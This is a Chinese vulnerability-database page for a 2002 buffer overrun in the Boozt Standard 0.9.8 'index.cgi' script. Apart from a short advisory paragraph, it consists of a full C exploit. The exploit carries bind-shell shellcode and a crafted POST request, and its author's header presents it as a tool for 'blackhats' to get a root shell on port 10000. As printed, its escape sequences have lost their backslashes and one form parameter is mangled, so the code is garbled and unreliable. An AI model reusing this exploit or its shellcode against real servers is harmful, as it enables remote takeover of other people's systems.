Boozt Standard 0.9.8 – ‘index.cgi’ Buffer Overrun
| 漏洞ID | 1053652 | 漏洞类型 | |
| 发布时间 | 2002-11-29 | 更新时间 | 2002-11-29 |
![图片[1]-Boozt Standard 0.9.8 – ‘index.cgi’ Buffer Overrun-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-Boozt Standard 0.9.8 – ‘index.cgi’ Buffer Overrun-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | CGI | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6281/info
A vulnerability has been discovered in Boozt. By passing a malicious parameter of excessive length to the index.cgi script, it is possible to overrun a buffer. This could be exploited by a remote attacker to corrupt sensitive memory, which may result in the execution of arbitrary code.
This issue is known to affect Boozt 0.9.8 and it is not known whether other versions are affected.
/* -----------------------------------------------------------------------
BOOZT! Not so Standard 0.9.8 CGI vulnerability exploit
fixed/updated by BrainStorm - ElectronicSouls
now its much more usefull ;>
Original Code by: Rafael San Miguel Carrasco - [email protected]
script kiddie enabled! .. this will give you a rootshell on port 10000
so this version isnt for admins its for blackhats! and kidz piss off!
this isnt widely used so nothing for kiddies anyway, since they cant own
100 systems with it =P ..
greetz: ghQst,FreQ,it_fresh,SectorX,RobBbot,0x90,Resistor,Phantom,
divineint,rocsteele,websk8ter,nutsax,BuRn-X and all other
ElectronicSouls members - j00 r0ck =>
-----------------------------------------------------------------------
*/
#include <netinet/in.h>
#define PORT 8080
#define BUFLEN 1597
#define RET 0xbffff297
#define NOP 0x90
int main (int argc, char **argv)
{
int sockfd,
i,
cont;
struct sockaddr_in dest;
int html_len = 15;
char cgicontent[2048];
char buf[BUFLEN];
char shellcode[]= "x31xc0" // xor eax, eax
"x31xdb" // xor ebx, ebx
"x89xe5" // mov ebp, esp
"x99" // cdq
"xb0x66" // mov al, 102
"x89x5dxfc" // mov [ebp-4], ebx
"x43" // inc ebx
"x89x5dxf8" // mov [ebp-8], ebx
"x43" // inc ebx
"x89x5dxf4" // mov [ebp-12], ebx
"x4b" // dec ebx
"x8dx4dxf4" // lea ecx, [ebp-12]
"xcdx80" // int 80h
"x89x45xf4" // mov [ebp-12], eax
"x43" // inc ebx
"x66x89x5dxec" // mov [ebp-20], bx
"x66xc7x45xeex27x10" // mov [ebp-18], word 4135
"x89x55xf0" // mov [ebp-16], edx
"x8dx45xec" // lea eax, [ebp-20]
"x89x45xf8" // mov [ebp-8], eax
"xc6x45xfcx10" // mov [ebp-4], byte 16
"xb2x66" // mov dl, 102
"x89xd0" // mov eax, ed
"x8dx4dxf4" // lea ecx, [ebp-12]
"xcdx80" // int 80h
"x89xd0" // mov eax, edx
"xb3x04" // mov bl, 4
"xcdx80" // int 80h
"x43" // inc ebx
"x89xd0" // mov eax, edx
"x99" // cdq
"x89x55xf8" // mov [ebp-8], edx
"x89x55xfc" // mov [ebp-4], edx
"xcdx80" // int 80h
"x31xc9" // xor ecx, ecx
"x89xc3" // mov ebx, eax
"xb1x03" // mov cl, 3
"xb0x3f" // mov al, 63
"x49" // dec ecx
"xcdx80" // int 80h
"x41" // inc ecx
"xe2xf8" // loop -7
"x52" // push edx
"x68x6ex2fx73x68" // push dword 68732f6eh
"x68x2fx2fx62x69" // push dword 69622f2fh
"x89xe3" // mov ebx, esp
"x52" // push edx
"x53" // push ebx
"x89xe1" // mov ecx, esp
"xb0x0b" // mov al, 11
"xcdx80"; // int 80h
char *html[15] =
{
"POST /cgi-bin/boozt/admin/index.cgi HTTP/1.0n",
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,*/*n",
"Referer: http://10.0.0.1:8080/cgi-bin/boozt/admin/index.cgi?section=5&input=1n",
"Accept-Language: en, den",
"Content-Type: application/x-www-form-urlencodedn",
"UA-pixels: 640x480n",
"UA-color: color8n",
"UA-OS: Blackhat Leenuxn",
"UA-CPU: x86n",
"User-Agent: Hackscape/1.0 (j00r asS gonna gets 0wned)n",
"Host: 10.0.0.1:8080n",
"Connection: Keep-Aliven",
"Content-Length: 1776n",
"Pragma: No-Cachen",
"n",
};
if (argc < 2)
{
printf ("usage: %s <IP>n", argv[0]);
exit (-1);
}
printf ("n-----------------------------------n");
printf (" BOOZT! Not so Standard exploit n");
printf (" (C) BrainStorm - ElectronicSouls n");
printf ("-----------------------------------nn");
for (i = 0; i < BUFLEN; i+=4)*( (long *) &buf[i]) = RET;
for (i = 0; i < (BUFLEN - 16); i++) buf[i] = NOP;
cont = 0;
for (i = (BUFLEN - strlen (shellcode) - 16); i < (BUFLEN - 16); i++)
buf[i] = shellcode [cont++];
strcpy (cgicontent, "name=");
strncat (cgicontent, buf, sizeof (buf));
strcat (cgicontent,"&target=&alt_text=&id_size=1&type=image&source=&source_path=Browse...&source_flash=&
source_flash_path=Browse...&script_name=&input=1§ion=5&sent=1&submit=Create+New+Banner");
printf ("* Connecting ...n");
if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
{
perror ("socket");
exit (-1);
}
bzero (&dest, sizeof (dest));
dest.sin_family = AF_INET;
dest.sin_port = htons (PORT);
dest.sin_addr.s_addr = inet_addr (argv[1]);
if (connect (sockfd, &dest, sizeof (dest)) < 0)
{
perror ("connect");
exit (-1);
}
printf ("* Connected. sending data ...n");
for (i = 0; i < html_len; i++)
{
if (write (sockfd, html[i], strlen(html[i])) < strlen(html[i]))
{
perror ("write");
exit (-1);
}
}
if (write (sockfd, cgicontent, strlen(cgicontent)) < strlen(cgicontent))
{
perror ("write cgicontent");
exit (-1);
}
if (close (sockfd) < 0)
{
perror ("close");
exit (-1);
}
printf("now connect to port 10000 on the victim host.. n");
printf("if everything went well you should get a rootshell :> nn");
printf("enjoy..n");
return 0;
}相关推荐: MacOS X SoftwareUpdate Arbitrary Package Installation Vulnerability
MacOS X SoftwareUpdate Arbitrary Package Installation Vulnerability 漏洞ID 1101828 漏洞类型 Design Error 发布时间 2002-07-08 更新时间 2002-07-08…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666